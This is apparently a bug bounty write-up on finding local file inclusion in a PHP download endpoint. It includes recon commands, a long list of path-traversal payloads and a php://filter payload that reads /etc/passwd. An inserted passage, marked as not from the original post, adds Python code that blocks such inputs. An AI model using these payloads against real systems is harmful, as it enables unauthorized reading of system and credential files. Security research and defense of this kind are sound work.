# Easy LFI

Hello Hackers!!

I'm going to share one of my latest and fastest findings.

Let's call it **target.com**; they run a bug bounty program with the wildcard scope **\*.target.com**.

#### Tools:

* [Subdomainer](https://github.com/Cyber-Guy1/Subdomainer)
* [waybackurls](https://github.com/tomnomnom/waybackurls)
* [gf](https://github.com/tomnomnom/gf)

### <mark style="color:yellow;">**Subdomains Enumeration**</mark>

In this step it's a golden tip to use multiple tools to gather good results. I like to use [**Subdomainer**](https://github.com/Cyber-Guy1/Subdomainer).

Subdomainer is an automation tool for gathering domains and subdomains, whether for a single target or multiple targets. It chains several tools to do the subdomain and domain gathering job properly; it can take a list of domains / targets, run the whole operation on them, and after finishing it saves the result in a readable and ordered way.

A simple usage of Subdomainer:

**`./subdomainer -t target.com -f true`**

A lot of things come after subdomain gathering; one of them is collecting all URLs from the live hosts and filtering out any interesting parameters or endpoints.

### <mark style="color:yellow;">Collect Them All</mark>

So in this step I use [**waybackurls**](https://github.com/tomnomnom/waybackurls).

Usage of waybackurls: this is a really good tool for bug bounty hunters to fetch all URLs of a host from the Wayback Machine.

**`cat all_live.txt | waybackurls`**

### <mark style="color:yellow;">Wrapper</mark>

Now that we have all the wayback URLs, you can grep them to collect your interesting parameter or endpoint. Usage:

**`grep -iE "redirect="`**

**But that would take a lot of time and effort. To automate this process we can use the** [**gf**](https://github.com/tomnomnom/gf) **tool.**

A wrapper around grep to avoid typing common patterns.

**`cat waybackdata | gf lfi | tee -a lfi.txt`**

After that we can go and check these endpoints manually.

Luckily, I noticed a very promising endpoint `/download.php?file` and my spidey sense got activated.

![](https://media.giphy.com/media/1qErVv5GVUac8uqBJU/giphy.gif)

After visiting this host I found that this endpoint was for downloading PDF files.

When trying to inject `1` into this parameter, it downloads a file containing this error:

![](/files/HP87KWvSwwDYpQAa8B7R)

So clearly this function's job is to search for the requested file via this parameter in that path and try to get it.

Without another thought I injected some payloads like these:

```
..\..\{FILE}
..\..\..\{FILE}
..\..\..\..\{FILE}
..\..\..\..\..\{FILE}
..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\{FILE}
..\..\..\..\..\..\..\..\{FILE}
..%255c{FILE}
..%255c..%255c{FILE}
..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
..%5c..%5c{FILE}
..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
%2e%2e\{FILE}
%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
%252e%252e\{FILE}
%252e%252e\%252e%252e\{FILE}
```

But no luck.. I got the same error message.

![](https://media.giphy.com/media/7SF5scGB2AFrgsXP63/giphy.gif)

In spite of that, something was telling me to keep digging into this 🧐

By using [wappalyzer](https://www.wappalyzer.com/) I found that this host is running PHP, so I used a PHP stream wrapper payload:

`php://filter/convert.base64-encode/resource=/etc/passwd`

![](/files/lq6TmcBR4xHeFtJBWJbB)

**php://filter** allows a pen tester to include local files and base64-encode the output. Therefore, any base64 output will need to be decoded to reveal the contents.

So let's decode this base64 string:

**`echo "BASE64_STRING" | base64 -d`**

![base64 decoded output from /etc/passwd on a UNIX / Linux system](/files/AKEpGpTCQK1p9KubgnBb)

And we got our **/passwd** file decoded
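As an added, defender-side example (not code from the original post), here is how a download endpoint like the one above could resolve its `file` parameter safely: it undoes repeated URL-encoding, treats backslashes as path separators, refuses stream wrappers such as `php://filter`, and only serves paths that stay inside the intended directory. The root directory and the file names are assumptions; Python is used so the check can be run stand-alone against the same payload shapes listed earlier in the post.

```python
import os
import urllib.parse

# Assumption: the directory the PDF download endpoint is meant to serve from.
DOWNLOAD_ROOT = "/var/www/app/pdf"


def canonicalize(requested: str) -> str:
    """Undo the encoding tricks used in traversal payloads.

    URL-decode until the value stops changing (so %255c -> %5c -> "\\"),
    bounded so a hostile input cannot keep us looping, then treat
    backslashes as separators so "..\\..\\" is not mistaken for a file name.
    """
    value = requested
    for _ in range(4):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def resolve_download(requested: str, root: str = DOWNLOAD_ROOT):
    """Return the absolute path to serve, or None if the request is unsafe.

    Rejects stream wrappers (php://, file://, data:) and NUL bytes, then
    checks that the normalized path is still strictly below `root`.
    normpath is used instead of realpath so the check works without the
    files existing; a real deployment should also resolve symlinks.
    """
    value = canonicalize(requested)
    lowered = value.lower()
    if "://" in lowered or lowered.startswith(("php:", "file:", "data:")):
        return None
    if "\x00" in value or value == "":
        return None
    # An absolute value makes os.path.join discard `root` entirely;
    # the containment check below catches that case as well.
    candidate = os.path.normpath(os.path.join(root, value))
    if not candidate.startswith(root + os.sep):
        return None
    return candidate
```

Ordinary names such as `report.pdf` or `reports/2023/q1.pdf` resolve under the root, while every traversal, double-encoded and wrapper variant returns `None` and can be logged as a probe.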

![](https://media.giphy.com/media/3ohhweiVB36rAlqVCE/giphy.gif)

### <mark style="color:yellow;">EXTRA</mark>

Although these tools and techniques are few, there is a lot that can be done with them. You can use multiple [Gf-Patterns](https://github.com/1ndianl33t/Gf-Patterns) to find:

* xss
* ssrf
* idor
* ssti
* open redirect
* etc.

A great Place to find more LFI bypassing tricks:

{% embed url="https://book.hacktricks.xyz/pentesting-web/file-inclusion" %}

> Thanks For Reading
